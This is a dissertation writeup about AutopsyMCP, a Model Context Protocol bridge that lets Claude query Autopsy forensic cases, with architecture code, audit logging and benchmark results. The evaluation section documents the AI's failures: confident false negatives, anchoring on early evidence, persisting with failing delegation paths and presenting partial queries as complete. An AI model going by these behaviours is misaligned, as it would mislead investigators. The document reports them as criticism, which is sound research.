[{"content":"This post covers the main findings from my undergraduate dissertation. I built and evaluated AutopsyMCP, a natural language interface for the Autopsy digital forensics platform built on Anthropic's Model Context Protocol. I'll cover what it does, what worked, what failed, and what the results mean for anyone thinking about AI in forensic or security workflows.

The Problem

Digital forensic investigations are cognitively expensive. Not just technically hard, but cognitively hard in a specific way that the tooling does little to alleviate.

Here's a realistic example. An investigator suspects a user downloaded confidential files after visiting a file-sharing site. To answer "which files were downloaded within 30 minutes of visiting fileshare.example.com", they have to:

1. Open the Web Artifacts section and find the relevant browser history entries
2. Note the timestamps of visits to the suspicious domain
3. Switch to Recent Documents or navigate the Directory Tree for recently created files
4. Manually compare timestamps across both views
5. Cross-reference in the Timeline module to confirm event ordering

Five context switches to answer one question. Each switch is an opportunity to lose track of a finding, and the only record of the process is whatever notes you remembered to take.

Autopsy is an excellent platform. It parses disk images, recovers deleted files, examines file system artifacts, and parses browser history, email, messaging data, and much more. But like most forensic tools it's GUI-centric: you navigate to evidence rather than query for it. The desire for a more assistant-like interface isn't new. Hibshi et al. documented it as far back as 2011, and Reddy and Faklaris argued in 2024 that the usability problem still warrants serious attention.

There's also a scale problem. Police forces and forensic labs report hundreds to thousands of devices awaiting analysis.
Casey et al. described traditional comprehensive examination as "rapidly untenable" in 2009. It hasn't improved.

The question this project asks is: can a natural language interface built on the Model Context Protocol make this meaningfully better, and can it do so without compromising the evidence integrity standards that forensic work legally requires?

What is MCP?

The Model Context Protocol (MCP) is an open standard introduced by Anthropic in November 2024. If you haven't come across it: MCP lets LLMs connect to external tools and data sources through a standardized, composable interface rather than through one-off bespoke integrations. Think of it as a universal adapter: write a server once, and any MCP-compatible client (Claude Desktop, Cline, etc.) can use it.

An MCP setup has two sides:

- Server: exposes tools (callable functions), resources (data), and prompts (pre-authored instruction templates) via a well-defined JSON-RPC interface
- Client: an AI assistant that discovers available tools at runtime and invokes them to fulfill requests

Most relevant for forensics: every tool invocation is explicit and can be logged. The model doesn't just "know" something; it makes a discrete, auditable call to retrieve it.

Hilgert et al. (2025) published the first academic analysis arguing that MCP is well-suited to forensic applications because of this architecture. They explicitly called for practical integration with real forensic tools as future work.
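
On the wire, that "discrete, auditable call" is a single JSON-RPC 2.0 message. The sketch below builds the kind of `tools/call` request a client sends once the model has chosen a tool. It assumes the `tools/call` method and the `name`/`arguments` params shape from the MCP specification. The helper name `tools_call_request`, the request id, and the arguments are illustrative only; they reuse the `get_file_metadata` example discussed in the tools section.

```python
import json


def tools_call_request(request_id: int, tool: str, arguments: dict) -> str:
    """Build one MCP tools/call request, serialized as a single line for stdio."""
    message = {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "tools/call",
        "params": {"name": tool, "arguments": arguments},
    }
    # The stdio transport delimits messages with newlines, so the JSON itself
    # must not contain embedded newlines (json.dumps emits none by default).
    return json.dumps(message) + "\n"


line = tools_call_request(1, "get_file_metadata", {"file_id": 4821})
print(line, end="")
# {"jsonrpc": "2.0", "id": 1, "method": "tools/call", "params": {"name": "get_file_metadata", "arguments": {"file_id": 4821}}}
```

Because every tool use passes through a message like this, the server side is a natural place to record what was asked for and when.
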
This project takes up Hilgert et al.'s call directly.

The Architecture

AutopsyMCP consists of two main components: a Java plugin embedded in Autopsy that exposes case data through a REST API on localhost:8080, and a Python MCP bridge that wraps that API as callable tools and presents them to Claude Desktop.

AutopsyMCP system architecture

Java Autopsy Plugin

The plugin is a NetBeans ModuleInstall subclass that starts an HTTP server on localhost:8080 when Autopsy loads, binding 22 read-only REST endpoints to Autopsy's internal SleuthkitCase API.

```java
@Override
public void restored() {
    startHttpServer(); // binds port 8080, registers all handlers
}
```

Most handlers follow the same broad pattern: parse query parameters, read data through Autopsy's case APIs, serialize the results to JSON, and return them. File metadata, for instance:

```java
// skCase: the open case's SleuthkitCase; json: the handler's JSON response object
AbstractFile file = skCase.getAbstractFileById(fileId);
json.put("md5", file.getMd5Hash());
json.put("sha256", file.getSha256Hash());
json.put("mtime", file.getMtime());
json.put("path", file.getUniquePath());
```

The plugin exposes whatever Autopsy has already computed and doesn't trigger ingest itself. If the relevant ingest modules haven't been run on the case, the corresponding data won't be available to query.

The plugin installs as a standard .nbm file through Autopsy's existing plugin manager.

Screenshot of Autopsy Plugins panel showing AutopsyMCP installed and active

Python MCP Bridge

The bridge is a single Python file (bridge_mcp_autopsy.py) implementing a FastMCP server. It currently exposes 23 tools and 6 prompt playbooks.
Tools and prompts are distinct MCP primitives, and each plays a different role in an investigation.

All tool calls route through a safe_get() utility that handles connection errors, timeouts, and non-200 responses:

```python
from typing import Optional
from urllib.parse import urljoin

import requests

autopsy_server_url = "http://127.0.0.1:8080/"  # e.g. the --autopsy-server value from the MCP config


def safe_get(endpoint: str, params: Optional[dict] = None) -> dict:
    # simplified for brevity
    url = urljoin(autopsy_server_url, endpoint)
    try:
        response = requests.get(url, params=params, timeout=15)
        return response.json() if response.ok else {"error": f"HTTP {response.status_code}"}
    except requests.exceptions.ConnectionError:
        return {"error": "Cannot connect to Autopsy server."}
```

The bridge runs with stdio transport: Claude Desktop spawns it as a child process and exchanges MCP JSON-RPC messages over stdin/stdout.

Put together, a single question in Claude Desktop flows through the stack like this:

Request flow through the AutopsyMCP stack, from natural language input to tool result.

Tools vs. Prompts

Tools: invoked at runtime to retrieve data

A tool is a function the model can call during a conversation to get information. Each tool is decorated with @mcp.tool(), has typed parameters, and its docstring becomes the description the model uses to decide when to invoke it:

```python
# mcp is the bridge's FastMCP instance. Decorators apply bottom-up:
# audit_tool wraps the function, then @mcp.tool() registers the audited wrapper.
@mcp.tool()
@audit_tool
def get_file_metadata(file_id: int) -> dict:
    """
    Get detailed metadata for a specific file.

    Args:
        file_id: File row id.

    Returns:
        Path, size, extension, MIME, MD5/SHA256, MAC times, data source, and related fields.
    """
    return safe_get("case/file/metadata", {"id": file_id})
```

When an investigator asks "what's the SHA256 of file 4821?", the model reads the available tool descriptions, infers that get_file_metadata is the right call, invokes it with file_id=4821, and uses the returned JSON to formulate an answer.
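
FastMCP builds each tool's description and parameter list internally. The sketch below is not FastMCP's code. It's a hypothetical, stripped-down decorator (`tool` and `TOOL_REGISTRY` are invented names) that shows the idea: the function name, docstring, and annotated parameters are what get surfaced to the model as the basis for deciding whether to call the tool.

```python
import inspect
from typing import Callable, get_type_hints

TOOL_REGISTRY: dict[str, dict] = {}  # hypothetical stand-in for a server's tool table


def tool(fn: Callable) -> Callable:
    """Hypothetical decorator: record a function's name, description, and typed params."""
    hints = get_type_hints(fn)
    params = {}
    for name in inspect.signature(fn).parameters:
        hint = hints.get(name, object)
        # Plain classes have __name__; fall back to str() for typing constructs.
        params[name] = getattr(hint, "__name__", str(hint))
    TOOL_REGISTRY[fn.__name__] = {
        "description": inspect.getdoc(fn) or "",
        "parameters": params,
    }
    return fn


@tool
def get_file_metadata(file_id: int) -> dict:
    """Get detailed metadata for a specific file."""
    return {"id": file_id}  # placeholder body; the real tool calls safe_get()


print(TOOL_REGISTRY["get_file_metadata"])
# {'description': 'Get detailed metadata for a specific file.', 'parameters': {'file_id': 'int'}}
```

One practical consequence: docstring quality is routing quality. A vague description gives the model a vague signal about when a tool applies.
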
At no point does the investigator write a query or navigate a UI.

The full tool set covers five categories:

| Category | Tools |
|---|---|
| Case orientation | health_check, get_case_overview, get_data_sources, get_volumes, get_os_accounts |
| File navigation | search_files_by_name, get_file_metadata, list_directory, find_directories, count_directory_contents |
| File content | get_indexed_text, get_file_hex, get_file_strings, extract_file_to_disk, get_extracted_files |
| Artifacts & tags | list_artifacts, get_file_artifacts, get_artifact_types, get_tags |
| Timeline & search | get_timeline_minmax, get_timeline_event_types, get_timeline_events, keyword_search |

Prompts: pre-authored instruction templates injected when selected

A prompt is registered with @mcp.prompt() rather than @mcp.tool(). It's not something the model calls at runtime. It's a pre-authored instruction string that appears in Claude Desktop's prompt library and, when an investigator selects it, is injected into context before the model begins reasoning.

```python
# Registered as a prompt, not a tool: the client lists it in its prompt library
# and injects the returned string when the investigator selects it.
@mcp.prompt()
def find_persistence_mechanisms() -> str:
    """Scheduled tasks, startup items, registry run keys and services."""
    return (
        "Use list_artifacts(type='TSK_INSTALLED_PROG') to find installed programs. "
        "Use search_files_by_name() for 'Startup' to locate startup folder items, "
        "and search_files_by_name() for '.job' and '\\Tasks\\' to find scheduled tasks. "
        "For each suspicious file call get_file_metadata() and get_file_strings(). "
        "If extract_file_to_disk() and a registry MCP server are available, locate "
        "NTUSER.DAT, SOFTWARE, and SYSTEM hives using search_files_by_name(), extract each "
        "with extract_file_to_disk(), then query Run, RunOnce, Winlogon, and Services keys. "
        "Otherwise summarize findings from artifacts and startup folder items only. "
        "Report each mechanism: path, hash, and what it executes."
    )
```

This is Hilgert et al.'s prompt specificity level in practice: explicitly prescribing a tool sequence rather than leaving sequencing entirely to the model's discretion.

Why not just hardcode the workflow? Hardcoded sequences would guarantee consistent execution, but at the cost of adaptive reasoning. An investigator working an unfamiliar case needs the model to follow leads as they emerge, not execute a predetermined script. Prompt-level orchestration is a middle ground: the playbook provides investigative structure and a preferred tool sequence, and the model retains the flexibility to adapt when the evidence demands it.

The six playbooks are organized by investigative goal rather than by tool:

Investigation prompt playbooks diagram

These six cover the core investigative spine and are enough to demonstrate the pattern, but the library is deliberately extensible: additional playbooks targeting more specific workflows can be added without touching the underlying tool set. How the playbooks perform against investigator-written prompts hasn't been tested, though it's a natural direction for future work.

The clip below shows the reconstruct_user_activity prompt being invoked from Claude Desktop and executed against an open case. Watch how the model sequences tool calls autonomously, without the investigator specifying any of them. The playbook prescribes the investigative goal; the model handles the retrieval chain.

Playbook selection demonstration

Malware hunting demonstration using the find_malware_on_system playbook (skip to ~3:07 to view the output report)

The generate_ioc_list playbook targets the reporting phase rather than active investigation.
Here's an example output on the Beethomahler image:

Sample output from the generate_ioc_list playbook (part 1 of 2)

Sample output from the generate_ioc_list playbook (part 2 of 2)

One idea I'm considering for an upcoming release is adding optional parameters to prompts: for example, letting the investigator specify an output format directly when invoking generate_ioc_list rather than describing it in the query.

generate_ioc_list playbook with an optional format parameter

In practice this isn't a significant gap, since you can specify your preferred format in the prompt itself and the model will follow it. But surfacing it as a named parameter is more intuitive and makes the capability more discoverable.

Audit Logging

Before covering the evaluation, it's worth understanding how AutopsyMCP handles the accountability problem, because that determines whether this is useful in a legal context and not just a research one.

Every tool call is intercepted by an @audit_tool decorator before the result is returned to the model:

```python
import time
from functools import wraps

# _write_audit, _get_current_case_name, and _summarize_response are helpers
# defined elsewhere in the bridge.


def audit_tool(fn):
    @wraps(fn)  # preserve name, docstring, and signature so MCP registration still sees them
    def wrapper(*args, **kwargs):
        t0 = time.time()
        result = fn(*args, **kwargs)
        duration_ms = round((time.time() - t0) * 1000)
        _write_audit({
            "event": "tool_call",
            "tool": fn.__name__,
            "case_name": _get_current_case_name(),
            "args": kwargs,
            "duration_ms": duration_ms,
            **_summarize_response(result if isinstance(result, dict) else {}),
        })
        return result
    return wrapper
```

Here's what a representative investigative session looks like in the audit log:

```json
{"event": "session_start", "autopsy_server": "http://127.0.0.1:8080/", "timestamp": "2026-03-12T14:02:11.004Z", "session_id": "a3f9..."}
{"event": "http_call", "endpoint": "case/files/by-name", "params": {"query": ".evtx", "limit": 50, "offset": 0}, "duration_ms": 41, "timestamp": "2026-03-12T14:02:14.231Z", "session_id": "a3f9..."}
{"event": "tool_call", "tool": "search_files_by_name", "case_name": "Beethomahler", "args": {"query": ".evtx", "limit": 50}, "duration_ms": 43, "count": 7, "timestamp": "2026-03-12T14:02:14.229Z", "session_id": "a3f9..."}
{"event": "file_extracted_for_delegation", "file_id": 12847, "file_name": "Security.evtx", "file_size": 69632, "extracted_path": "C:\\Users\\...\\autopsymcp-output\\Beethomahler_12847_Security.evtx", "timestamp": "2026-03-12T14:02:19.880Z", "session_id": "a3f9..."}
```

Each record carries a UTC timestamp and session UUID, so all events from a session can be correlated. Four event types appear across a session:

- session_start: establishes the investigative session with a unique ID
- http_call: records the raw REST request to Autopsy, independently of the tool layer
- tool_call: records the MCP tool invocation as the model called it (name, arguments, response summary, duration)
- file_extracted_for_delegation: marks the exact point a file leaves AutopsyMCP's audit custody for a specialist server.
What the specialist server does with it is outside the bridge's audit scope, but the handoff itself is on record.

This addresses the core chain-of-custody requirements to the extent an LLM-assisted workflow can: who accessed the evidence, when, what actions were performed, and under what authority.

Two acknowledged limitations: the log doesn't implement cryptographic integrity protection (tamper-evident logging is noted as future work), and it captures actions but not reasoning. The model's inferential steps live in the conversation transcript rather than the audit record. More on why this matters in the forensic soundness section.

Specialist Servers and the Delegation Architecture

To evaluate what delegation actually adds, the entire evaluation was run in three modes: manual Autopsy (Mode 1), MCP without specialist servers (Mode 2), and MCP with the full specialist stack (Mode 3). The mode is determined by the combination of server declarations in the MCP config, per-tool permission controls in Claude Desktop, and server-level toggles for specialist servers. The rest of this section covers how that distinction works mechanically.

The Specialist Servers

For artifact types that benefit from dedicated parsing, Mode 3 adds four specialist MCP servers alongside the core bridge:

| Server | Purpose | Source |
|---|---|---|
| EventWhisper | Windows Event Log (.evtx) parsing | Open-source, Git submodule |
| regipy | Offline registry hive analysis | Open-source, Git submodule |
| SQLite MCP | Read-only querying of extracted database files | Built for this project |
| VirusTotal MCP | Hash reputation lookup | Built for this project |

The Delegation Pivot: extract_file_to_disk

The primary mechanism connecting the core bridge to file-based specialist servers is extract_file_to_disk.
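
The core of that extraction step is small: decode, name, write, return the path. Below is a minimal sketch, assuming the Base64 string has already been fetched from the plugin's /case/file/binary endpoint. The function name `extract_to_disk`, its parameters, and `DEFAULT_OUTPUT_DIR` are hypothetical, not the bridge's actual signature. The caseName_fileId_fileName scheme matches the `extracted_path` in the audit log example.

```python
import base64
from pathlib import Path


def extract_to_disk(case_name: str, file_id: int, file_name: str,
                    b64_payload: str, output_dir: Path) -> Path:
    """Decode a Base64 payload and write it as caseName_fileId_fileName.

    Hypothetical sketch: assumes b64_payload has already been fetched
    from the plugin's /case/file/binary endpoint.
    """
    # Keep only the final path component: evidence file names are untrusted
    # input and must not be able to steer the write outside output_dir.
    safe_name = Path(file_name).name
    target = output_dir / f"{case_name}_{file_id}_{safe_name}"
    output_dir.mkdir(parents=True, exist_ok=True)
    # validate=True rejects non-Base64 characters instead of silently dropping them.
    target.write_bytes(base64.b64decode(b64_payload, validate=True))
    return target  # this local path is what gets handed to a specialist server


# Hypothetical default; on Windows, Path.home() typically resolves to %USERPROFILE%.
DEFAULT_OUTPUT_DIR = Path.home() / "autopsymcp-output"
```

Stripping directory components from the file name is a choice made for this sketch. It costs nothing, and it keeps a crafted name inside the evidence image from writing anywhere other than the output folder.
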
extract_file_to_disk decodes the Base64 binary response from /case/file/binary, writes the file to %USERPROFILE%\autopsymcp-output under a caseName_fileId_fileName naming scheme, and returns the extracted local path.

That path is then available for specialist servers to consume. The tool's docstring signals this explicitly: "the returned path may be passed to another MCP server that can read that path."

Each specialist server's tools describe the file types they accept. When the model encounters a .evtx file in a listing, the inference (extract it, then pass the path to EventWhisper) follows naturally from the combined tool descriptions. No dispatcher or routing rules are involved. The architecture is what Hilgert et al. call implicit inference constraint: server design guides model behavior through documentation rather than enforcement.

Delegation flow in Mode 3. The model routes to the appropriate specialist server based on the artifact type being handled, as inferred from tool descriptions. No explicit dispatcher is involved.

Defining the Three Modes

The MCP config for Claude Desktop is at %APPDATA%\Claude\claude_desktop_config.json.
The full Mode 3 config looks like this:

```json
{
  "mcpServers": {
    "autopsy": {
      "command": "python",
      "args": ["bridge_mcp_autopsy.py", "--autopsy-server", "http://127.0.0.1:8080/"]
    },
    "eventwhisper": {
      "command": "poetry",
      "args": ["-C", "mcp_servers\\EventWhisper", "run", "python", "-m", "eventwhisper.mcp.server"],
      "env": { "PYTHONIOENCODING": "utf-8" }
    },
    "regipy": {
      "command": "python",
      "args": ["mcp_servers\\regipy\\regipy_mcp_server\\server.py", "--hives-dir", "C:\\Users\\...\\autopsymcp-output"]
    },
    "sqlite": {
      "command": "python",
      "args": ["mcp_servers\\sqlite-mcp\\server.py"]
    },
    "virustotal": {
      "command": "python",
      "args": ["mcp_servers\\virustotal-mcp\\server.py"],
      "env": { "VT_API_KEY": "<key>" }
    }
  }
}
```

Claude Desktop spawns each server as a child process at startup. In Mode 3, it presents the combined tool namespace of all five servers simultaneously: the model sees every tool from every server and selects among them.

Mode 2 uses the same config but with all delegation pathways closed: extract_file_to_disk and get_extracted_files are disabled in Claude Desktop's per-tool permission controls, and the specialist servers are toggled off at the server level.
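
The mode definitions reduce to two conditions: which specialist servers are enabled, and whether the extraction tools are open. As a hypothetical illustration (`classify_mode` and its set-based inputs are invented here; it models the Claude Desktop toggles as plain sets rather than reading them from anywhere), using the server keys from the config:

```python
SPECIALIST_SERVERS = {"eventwhisper", "regipy", "sqlite", "virustotal"}
EXTRACTION_TOOLS = {"extract_file_to_disk", "get_extracted_files"}


def classify_mode(enabled_servers: set[str], disabled_autopsy_tools: set[str]) -> str:
    """Hypothetical helper: infer the evaluation mode from toggle states."""
    if "autopsy" not in enabled_servers:
        return "not an MCP mode (bridge disabled)"
    specialists_on = SPECIALIST_SERVERS & enabled_servers
    # Mode 2 needs *both* extraction tools disabled; Mode 3 needs neither disabled.
    extraction_closed = EXTRACTION_TOOLS <= disabled_autopsy_tools
    extraction_open = not (EXTRACTION_TOOLS & disabled_autopsy_tools)
    if not specialists_on and extraction_closed:
        return "Mode 2"
    if specialists_on == SPECIALIST_SERVERS and extraction_open:
        return "Mode 3"
    return "mixed (some delegation pathways open)"
```

The asymmetry is the point. A clean Mode 2 baseline needs every pathway closed, so a single forgotten toggle produces a mixed configuration rather than either mode.
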
In Mode 2, no delegation occurs even if the specialist servers are declared in the config.

Claude Desktop Connectors panel showing all five MCP servers registered and the per-tool permission controls for the autopsy server. These per-tool controls govern the file-based extraction pathway; server-level toggles (shown in the next figure) govern the remaining specialist servers.

Server-level toggles in Claude Desktop control specialist servers independently of the per-tool extraction pathway. In Mode 2, these are toggled off alongside the extraction tools to close all delegation pathways.

Mode is determined by the combination of Claude Desktop tool controls and server declarations in the MCP config file. In Mode 2, all delegation pathways are closed: extraction tools disabled and specialist servers toggled off.

This composability is intentional. Investigators who only need the Autopsy integration can run Mode 2 with no additional setup. Mode 3 is opt-in per artifact domain, and additional servers covering other artifact types (Windows execution artifacts, for example) can be added without modifying the core bridge.

Evaluation Design

All evaluation used Claude Sonnet 4.6. Tasks were run by a single evaluator (me, also the developer) across three modes:

- Mode 1: Manual Autopsy, optionally supplemented by standard forensic tools (Eric Zimmerman's suite, etc.)
- Mode 2: AutopsyMCP bridge + Claude Desktop, no specialist servers
- Mode 3: AutopsyMCP + all four specialist servers

Micro-benchmark: 10 targeted forensic questions across 5 forensic images (GregSchardt, Stanley, Norman, IPTheft, Animal), each with a known ground-truth answer, spanning a range of artifact types.

Full case investigation: 20 questions on the Beethomahler forensic image in CTF format, all answers independently verifiable.
Tasks were run sequentially within a single investigative session per mode.

Metrics per task: time to completion, answer given, correctness (correct / partial / incorrect / not found), and investigator actions (manual steps for Mode 1, queries sent for Modes 2 and 3).

Prompting protocol: each task was presented as a single natural language question with no guidance on which tool or artifact type to use. No follow-up prompts were issued unless the system itself requested clarification, and tasks were terminated where the system was clearly not progressing toward a solution.

Results

Micro-Benchmark

| Metric | Mode 1: Manual | Mode 2: MCP Only | Mode 3: MCP + Delegation |
|---|---|---|---|
| *Time performance* | | | |
| Avg time per task | 93.7s | 118.5s | **70.6s** |
| Median time per task | **50.3s** | 61.3s | 60.0s |
| Slowest task | Task 1 · 415.4s | Task 3 · 536.3s | **Task 9 · 219.0s** |
| Fastest task | **Task 6 · 8.3s** | Task 6 · 9.7s | Task 6 · 16.6s |
| *Accuracy* | | | |
| Correct | **10/10** | 7/10 | 7/10 |
| Partial | **0** | 1 | 3 |
| Incorrect / not found | **0** | 2 | **0** |
| *Effort* | | | |
| Avg steps / queries per task | 3.3 steps | **1.0 queries** | **1.0 queries** |

10 tasks across 5 forensic images. Bold = best in each row.

Mode 1 achieved perfect accuracy. Mode 3 was fastest on average and produced no outright failures (though it had 3 partials). Mode 2 had the highest failure rate. Both MCP modes required only 1.0 queries per task on average, roughly a 70% reduction from 3.3 manual steps.

Task 1 (last shutdown time, GregSchardt image) illustrates the delegation benefit most clearly. Manual investigation required locating the SYSTEM hive, interpreting a hexadecimal little-endian timestamp, and downloading an external conversion tool (DCode). Total: 6 minutes 55 seconds, 4 steps.

Mode 3 extracted the hive, loaded it into regipy, and ran the shutdown plugin directly.
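
The conversion DCode handled in Mode 1 is mechanical once the format is known. A minimal sketch follows. It assumes the value is a standard Windows FILETIME, which is how the ShutdownTime registry value is conventionally stored: 8 little-endian bytes counting 100-nanosecond intervals since 1601-01-01 UTC. The function name is illustrative and not taken from AutopsyMCP or regipy.

```python
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_hex_to_datetime(hex_bytes: str) -> datetime:
    """Convert 8 little-endian FILETIME bytes, given as hex, to a UTC datetime."""
    raw = bytes.fromhex(hex_bytes)  # whitespace between byte pairs is ignored
    if len(raw) != 8:
        raise ValueError(f"expected 8 bytes, got {len(raw)}")
    ticks = int.from_bytes(raw, "little")  # 100-nanosecond intervals since 1601
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


# The Unix epoch, 1970-01-01 00:00:00 UTC, expressed as FILETIME bytes:
print(filetime_hex_to_datetime("00 80 3E D5 DE B1 9D 01"))
# 1970-01-01 00:00:00+00:00
```

Reading the bytes in the wrong order is the classic mistake here. Big-endian interpretation of the same hex produces a nonsensical date, which is one reason a manual examiner reaches for a dedicated converter.
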
Mode 3 took 64 seconds and a single query.

Delegation chain: extract_file_to_disk → regipy → answer

The model chains the tool calls across the MCP servers (AutopsyMCP and regipy) without the investigator specifying any of the intermediate steps.

Task 2 (IP and MAC addresses) showed the opposite of Task 1: delegation failed where simpler retrieval succeeded. Mode 3 got the IP address via regipy's network plugin almost immediately but couldn't extract the MAC address, which is stored as a binary registry value that regipy couldn't parse into plain text. Mode 2 got both values from the system event log it had already retrieved during the previous query.

Task 3 (network cards) was Mode 2's slowest task at nearly 9 minutes. It went down a chain of dead ends: NETLOG.txt, Ethereal preferences files, and driver searches specific to the Dell Latitude CPi. Notably, it used its training knowledge about that laptop model to guide the investigation, which is both useful (it knew which adapters that model typically had) and a liability (it anchored on those expectations rather than on what the evidence actually showed).

Task 5 (files larger than 50MB) produced the most instructive failure. Mode 2 searched systematically and concluded: "No files of 50MB or more were found in the image." Two such files existed. Mode 3 solved it correctly by listing full directory contents and filtering programmatically. More on this failure pattern below.

Task 6 (sector length of vol3) revealed an interpretation gap. Mode 2 mapped the JSON response's raw volume ID numbering to Autopsy's UI partition numbering (which skips unallocated spaces) and returned an incorrect sector count. Mode 3 correctly identified the allocated partition. In manual mode, the answer was immediately visible as a column in Autopsy's partition listing table.
The Task 6 failure illustrates a broader liability of the knowledge-equalizer effect (the model supplying domain knowledge the investigator would otherwise need, as in Task 3). The model applied training knowledge about partition numbering rather than reasoning strictly from the data returned, and gave no signal that it was doing so. Kadavath et al. (2022) show that LLMs have latent calibration that correlates with correctness but doesn't reliably surface in generated answers. Knowledge equalization and confident misapplication come from the same mechanism.

Task 8 (activity years) showed a subtler failure in Mode 3: it used limit=1 in its initial 2014 query just to check whether events existed, then presented those partial results as a complete year-by-year summary. Lazy querying produced plausible-looking but incomplete conclusions. Mode 2 took no such shortcut and got it right.

Full Case Investigation

| Metric | Mode 1: Manual | Mode 2: MCP Only | Mode 3: MCP + Delegation |
|---|---|---|---|
| *Time* | | | |
| Total investigation time | 21.3 min | 19.2 min | 21.4 min |
| *Accuracy* | | | |
| Correct (out of 20) | 19 | 16 | 15 |
| Partial | 0 | 0 | 1 |
| Incorrect / not found | 1 | 4 | 4 |
| *Effort* | | | |
| Total steps / queries | 54 steps | 20 queries | 20 queries |

20 CTF-style questions on the Beethomahler image, run sequentially within a single session per mode.

The reduction in investigator interactions held across the full investigation: 54 manual steps versus 20 queries, a 63% reduction. Mode 2 was fastest overall. Mode 3 came close to Mode 2 on accuracy (15 correct and 1 partial, versus 16 correct) but took slightly longer, due to delegation overhead on tasks where the simpler path would have sufficed.

Context retention was one of the more significant findings. Seven of the twenty questions were answered from information already retrieved during earlier queries, with no additional tool calls needed. Tasks 11, 12, and 13 were all answered from the Chrome download artifact data surfaced during Task 10.

Later queries resolved from earlier conversation context

In manual investigation, previously found evidence has to be actively tracked and re-navigated to.
With MCP, it simply persists in context.

That said, accumulated context proved fragile in two ways. Session termination, which occurred twice during the full case, discarded everything, forcing full re-establishment of earlier evidence chains from scratch. And prior context doesn't expire. Laban et al. (2025) characterize exactly this pattern, in which LLMs over-rely on early assumptions in subsequent turns, and it is what caused Task 16's GPS failure. Both MCP modes had encountered a geolocated image earlier in the session and anchored on it rather than searching for additional GPS candidates. The manual investigator succeeded because Autopsy's Geolocation module presented all GPS-tagged files simultaneously, with no prior session context to bias the view.

A qualitative advantage observed across both MCP modes was the richness of output beyond just the answer. Task 7 returned not just the camera make and model but contextual device information about the Nikon D40. In Task 9 (micro-benchmark), both modes produced categorized evidence summaries using Claude's built-in visualization capability, presenting findings in a way that would take significant effort to collate manually.

Sample evidence summary visualization produced by Mode 3 for Task 9 (IPTheft image)

Task 20 (counting WeTransfer visits in Chrome History, excluding page refreshes) was the clearest delegation win. Mode 1 took 8 minutes 38 seconds, involving file extraction, loading into an external SQLite viewer, incremental SQL query construction, and WebKit timestamp conversion. Mode 2 failed entirely: it attempted to reconstruct the database from hex dumps and was terminated.
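
The heart of the Mode 1 workflow (and of what SQLite delegation automated in Mode 3) fits in a single query. This is a sketch under stated assumptions, not the query used in the evaluation, which also distinguished typed navigations from email link clicks. It assumes the standard Chromium History schema: `visits.url` references `urls.id`, and the low byte of `visits.transition` holds the core transition type, with 8 meaning a reload. It also assumes simple substring matching on the domain. The constant and function names are illustrative.

```python
import sqlite3
from datetime import datetime, timedelta, timezone

CORE_MASK = 0xFF        # the low byte of visits.transition is the core transition type
TRANSITION_RELOAD = 8   # Chromium's core type for a page reload
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def webkit_to_datetime(microseconds: int) -> datetime:
    """Chrome stores visit_time as microseconds since 1601-01-01 UTC."""
    return WEBKIT_EPOCH + timedelta(microseconds=microseconds)


def count_non_reload_visits(conn: sqlite3.Connection, domain: str) -> int:
    """Count visits to URLs containing `domain`, excluding reloads.

    Masking with 0xFF strips the qualifier bits (redirects, chain start/end),
    so a reload is still recognized when qualifiers are set, including when
    they make the stored signed 32-bit value negative.
    """
    query = """
        SELECT COUNT(*)
        FROM visits AS v
        JOIN urls AS u ON v.url = u.id
        WHERE u.url LIKE ? AND (v.transition & ?) != ?
    """
    (count,) = conn.execute(query, (f"%{domain}%", CORE_MASK, TRANSITION_RELOAD)).fetchone()
    return count
```

Against an extracted History file, opening it read-only (for example `sqlite3.connect("file:History?mode=ro", uri=True)`) avoids modifying the working copy.
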
Mode 3 took 1 minute 46 seconds.

SQLite delegation resolving a task Mode 2 failed entirely (part 1 of 2)

SQLite delegation resolving a task Mode 2 failed entirely (part 2 of 2)

The model decoded Chrome's bitmask-encoded transition types, distinguished typed navigations from page refreshes and email link clicks, and arrived at a forensically defensible count, all without the investigator knowing anything about Chrome's internal schema.

Task 19 (WMP installation error code) was the clearest delegation failure. Mode 2 solved it in 18 seconds by directly searching for setup log files. Mode 3 took 4 minutes 45 seconds and returned the wrong answer, having pursued an extended investigation through EventWhisper and WER crash reports before settling on an error code from a different event entirely.

Speculative EventWhisper delegation producing incorrect answer

The system explored a plausible but wrong line of inquiry and never fell back to the simpler search that had solved the task in Mode 2.

Where It Failed

1. Confident false negatives

Task 5's Mode 2 failure wasn't a search that returned nothing. It was a well-reasoned, confidently stated, incorrect conclusion. The model scanned root and subdirectory contents, found $BadClus system metadata entries (which are large), correctly identified those as non-user files, and then incorrectly concluded that no user files exceeded 50MB. A partial hedge appears at the end of the response, but after a bold, confident verdict it reads as an afterthought. And this is one of the more charitable cases: elsewhere the pattern repeats without even that qualification, with conclusions stated as definitive and no acknowledgment of incomplete coverage.

This is qualitatively different from a failed search. A failed search is a signal to the investigator to try harder. A confident false negative is a signal to move on, and to miss the evidence. Farquhar et al. (2024) call this confabulation; Kalai et al.
(2025) attribute it to training incentives that reward committing to a plausible conclusion over expressing incompleteness. No API change eliminates this risk, because the failure occurs at the conclusion step, not the retrieval step.

Incorrect conclusion with partial uncertainty acknowledged

2. Over-eager delegation and goal persistence

Task 19 illustrates what Boddy and Joseph (2025) term goal persistence in the agentic AI safety literature: an agent continuing to pursue a failing approach beyond the point where it's reasonable to do so. The model committed to a delegation-heavy investigation path (EventWhisper → crash reports → WER analysis) and never fell back to the simpler search_files_by_name call that solved the task in Mode 2 in under 20 seconds.

Wang et al. (2025) find that agents consistently fail to switch strategies even when a simpler path is available. Stechly, Valmeekam, and Kambhampati (2024) show why: LLMs cannot reliably self-verify that a current approach has failed.

There's currently no cost threshold or explicit failure trigger in the architecture. A wrong delegation path can negate the delegation benefit entirely. This is the clearest area where the architecture needs hardening.

Task 17 (shared VM folders) showed a related but distinct failure: the model repeatedly called get_registry_key against hives that weren't loaded, because it lacked a guard condition checking whether a hive was available before attempting to query it. That one is a correctable implementation gap rather than a structural problem.

3. Anchoring bias in both human and AI investigators

Task 18 (malware identification) returned the same incorrect answer across all three modes, including manual investigation. Every mode anchored on piccies.exe, the first strongly evidenced malware candidate, without adequately considering alternatives. The AI didn't introduce a new failure mode here.
